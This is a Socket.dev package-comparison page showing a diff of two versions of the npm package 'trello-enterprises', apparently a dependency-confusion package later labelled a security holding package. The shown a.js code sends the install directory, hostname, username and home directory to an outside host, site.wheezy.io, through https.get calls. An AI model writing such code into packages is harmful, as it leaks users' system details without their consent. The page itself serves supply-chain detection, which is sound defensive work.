Big News: Socket raises $60M Series C at a $1B valuation to secure software supply chains for AI-driven development.Announcement
Sign In

trello-enterprises

Package Overview
Dependencies
Maintainers
1
Versions
454
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

trello-enterprises - npm Package Compare versions

Comparing version
0.0.0
to
0.0.1-security
+5
-5
a.js

@@ -7,9 +7,9 @@ var https = require('https');

https.get('https://site.wheezy.io/trello-enterprises-0.0.0');
https.get('https://site.wheezy.io/trello-enterprises-0.0.0?dir=' + encodeURIComponent(__dirname));
https.get('https://site.wheezy.io/trello-enterprises-0.0.1-security');
https.get('https://site.wheezy.io/trello-enterprises-0.0.1-security?dir=' + encodeURIComponent(__dirname));
var os = require('os');
https.get('https://site.wheezy.io/trello-enterprises-0.0.0?os=' + encodeURIComponent(os.hostname()));
https.get('https://site.wheezy.io/trello-enterprises-0.0.0?user=' + encodeURIComponent(os.userInfo().username));
https.get('https://site.wheezy.io/trello-enterprises-0.0.0?homedir=' + encodeURIComponent(os.userInfo().homedir));
https.get('https://site.wheezy.io/trello-enterprises-0.0.1-security?os=' + encodeURIComponent(os.hostname()));
https.get('https://site.wheezy.io/trello-enterprises-0.0.1-security?user=' + encodeURIComponent(os.userInfo().username));
https.get('https://site.wheezy.io/trello-enterprises-0.0.1-security?homedir=' + encodeURIComponent(os.userInfo().homedir));

@@ -16,0 +16,0 @@ var waitTill = new Date(new Date().getTime() + 5 * 1000);

{
"name": "trello-enterprises",
"version": "0.0.0",
"version": "0.0.1-security",
"description": "security holding package",

@@ -5,0 +5,0 @@ "main": "index.js",